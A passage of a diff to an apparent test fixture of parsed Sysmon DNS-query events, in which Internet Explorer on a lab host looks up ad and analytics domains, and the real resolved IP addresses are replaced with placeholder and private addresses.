Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -3838,12 +3782,12 @@ "type": "CNAME" }, { - "data": "172.217.10.66", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "network": { 
@@ -3859,13 +3803,13 @@ "pagead2.googlesyndication.com" ], "ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741282700Z", + "ingested": "2021-12-09T13:50:23.456770Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3929,12 +3873,12 @@ "type": "CNAME" }, { - "data": "172.217.10.66", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "network": { 
@@ -3950,13 +3894,13 @@ "googleads.g.doubleclick.net" ], "ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741291200Z", + "ingested": "2021-12-09T13:50:23.456775800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -4024,47 +3968,47 @@ "type": "CNAME" }, { - "data": "52.22.184.73", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.152.30.174", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.213.70.197", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.158.57.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.6.39.34", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.0.113.251", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.213.8.28", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.215.246.105", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "52.22.184.73", - "54.152.30.174", - "3.213.70.197", - "54.158.57.141", - "52.6.39.34", - "52.0.113.251", - "3.213.8.28", - "3.215.246.105" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -4081,20 +4025,13 @@ "pixel.advertising.com" ], "ip": [ - "52.22.184.73", - "54.152.30.174", - "3.213.70.197", - "54.158.57.141", - "52.6.39.34", - "52.0.113.251", - "3.213.8.28", - "3.215.246.105" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741299800Z", + "ingested": "2021-12-09T13:50:23.456781500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:52.22.184.73;::ffff:54.152.30.174;::ffff:3.213.70.197;::ffff:54.158.57.141;::ffff:52.6.39.34;::ffff:52.0.113.251;::ffff:3.213.8.28;::ffff:3.215.246.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -4166,15 +4103,15 @@ "type": "CNAME" }, { - "data": "54.210.214.197", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.202.202.147", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -4182,16 +4119,16 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "54.210.214.197", - "52.202.202.147", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { 
@@ -4209,17 +4146,16 @@ "onevideosync.uplynk.com" ], "ip": [ - "54.210.214.197", - "52.202.202.147", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741308300Z", + "ingested": "2021-12-09T13:50:23.456787300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:54.210.214.197;::ffff:52.202.202.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -4267,7 +4203,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741316800Z", + "ingested": "2021-12-09T13:50:23.456793Z", "code": "16", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e16\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e16\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:37.933324000Z'/\u003e\u003cEventRecordID\u003e1\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4616' ThreadID='4724'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-3541430928-2051711210-1391384369-1001'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:37.933\u003c/Data\u003e\u003cData Name='Configuration'\u003eC:\\Users\\vagrant\\Downloads\\\"C:\\Users\\vagrant\\Downloads\\Sysmon.exe\" -i -n\u003c/Data\u003e\u003cData Name='ConfigurationFileHash'\u003e\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -4331,12 +4267,12 @@ "type": "CNAME" }, { - "data": "50.116.194.21", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "50.116.194.21" + "89.160.20.156" ] }, "network": { 
@@ -4352,13 +4288,13 @@ "ad.turn.com" ], "ip": [ - "50.116.194.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741325400Z", + "ingested": "2021-12-09T13:50:23.456798900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:50.116.194.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -4422,47 +4358,47 @@ "type": "CNAME" }, { - "data": "34.225.20.218", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.216.14.125", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.200.28.150", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.216.103.132", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.4.86.222", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.21.200.160", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.216.249.238", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.94.175.146", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "34.225.20.218", - "3.216.14.125", - "52.200.28.150", - "3.216.103.132", - "52.4.86.222", - "52.21.200.160", - "3.216.249.238", - "3.94.175.146" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -4478,20 +4414,13 @@ "ups.analytics.yahoo.com" ], "ip": [ - "34.225.20.218", - "3.216.14.125", - "52.200.28.150", - "3.216.103.132", - "52.4.86.222", - "52.21.200.160", - "3.216.249.238", - "3.94.175.146" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741334100Z", + "ingested": "2021-12-09T13:50:23.456804700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:34.225.20.218;::ffff:3.216.14.125;::ffff:52.200.28.150;::ffff:3.216.103.132;::ffff:52.4.86.222;::ffff:52.21.200.160;::ffff:3.216.249.238;::ffff:3.94.175.146;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
